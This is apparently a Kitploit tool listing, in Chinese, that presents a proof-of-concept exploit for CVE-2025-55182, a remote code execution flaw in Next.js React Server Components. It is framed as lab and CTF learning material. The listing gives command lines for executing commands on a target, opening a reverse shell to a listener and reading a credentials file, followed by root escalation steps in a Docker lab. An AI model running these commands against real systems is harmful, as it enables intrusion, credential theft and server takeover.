Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC_react2shell_CVE-2025-55182 | Kitploit
工具/GitHubGitHub/nkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182
Payload生成漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育实验室与实践
GitHubnkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182

POC_react2shell_CVE-2025-55182

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库网站
28个月前尚未审核

Next.js React Server Components RCE 漏洞利用

通过原型污染利用 CVE-2025-55182 实现远程代码执行(RCE)。

作者: Severian N.K.

描述

该工具利用 Next.js 应用中 React Server Components 的原型污染漏洞,实现远程代码执行(RCE)。它支持直接命令执行和反弹 Shell 两种方式。

安装

本项目使用 Python 虚拟环境来管理依赖。首先,请确保你已安装 Python 3。

  1. 创建虚拟环境:

    root@kitploit:~
    python3 -m venv venv
    
  2. 激活环境并安装依赖:

    root@kitploit:~
    source venv/bin/activate
    pip install -r requirements.txt
    

使用方法

在运行漏洞利用程序之前,请确保虚拟环境已激活(source venv/bin/activate)。

命令执行

在目标上执行单条命令:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c "<COMMAND>"

示例:

root@kitploit:~
python3 exploit.py -u http://example.com -c "id"

反弹 Shell

从目标获取反弹 Shell:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r -l <LISTENER_IP> -p <LISTENER_PORT>

示例:

root@kitploit:~
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo

实验环境

lab/ 目录包含两个独立的 Docker 环境:

  1. 存在漏洞的应用(lab/vulnerable):运行在 3000 端口。
  2. 已修补的应用(lab/patched):运行在 3001 端口。

1. 设置存在漏洞的应用

root@kitploit:~
cd lab/vulnerable
chmod +x build.sh run.sh
./build.sh
./run.sh

访问地址:http://localhost:3000

2. 设置已修补的应用

root@kitploit:~
cd lab/patched
chmod +x build.sh run.sh
./build.sh
./run.sh

访问地址:http://localhost:3001

3. 测试反弹 Shell

你必须指定监听 IP(--lhost)和端口(--lport)。你可以通过 ip addr show docker0 查看 Docker 桥接 IP(通常为 172.17.0.1)。

root@kitploit:~
python exploit.py -u http://localhost:3000 -r -l 172.17.0.1 -p 6000 -P nc-mkfifo

注意: 我们使用 -P nc-mkfifo,因为目标运行的是 Alpine Linux,需要特定的 Payload 类型。

步骤 2:访问机密信息

存在漏洞的容器暴露了一个机密文件。

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "cat /secret/credentials.txt"
# Output: manager:SuperSecret2025!

步骤 3:权限提升

你可以使用泄露的凭据从 nextjs 提升到 root 权限。

  1. 切换用户:su - manager(密码:SuperSecret2025!)
  2. 成为 Root:sudo su(密码:SuperSecret2025!)
  3. 获取 Flag:
    root@kitploit:~
    cat /root/flag.txt
    # Output: Congratulations! You have gained full control over the system!
    

参考链接

  • 技术分析(Gist)
  • 动手实验(TryHackMe)

贡献

欢迎贡献!如果你发现 Bug 或有改进想法,请提交 Issue 或发起 Pull Request。

下载工具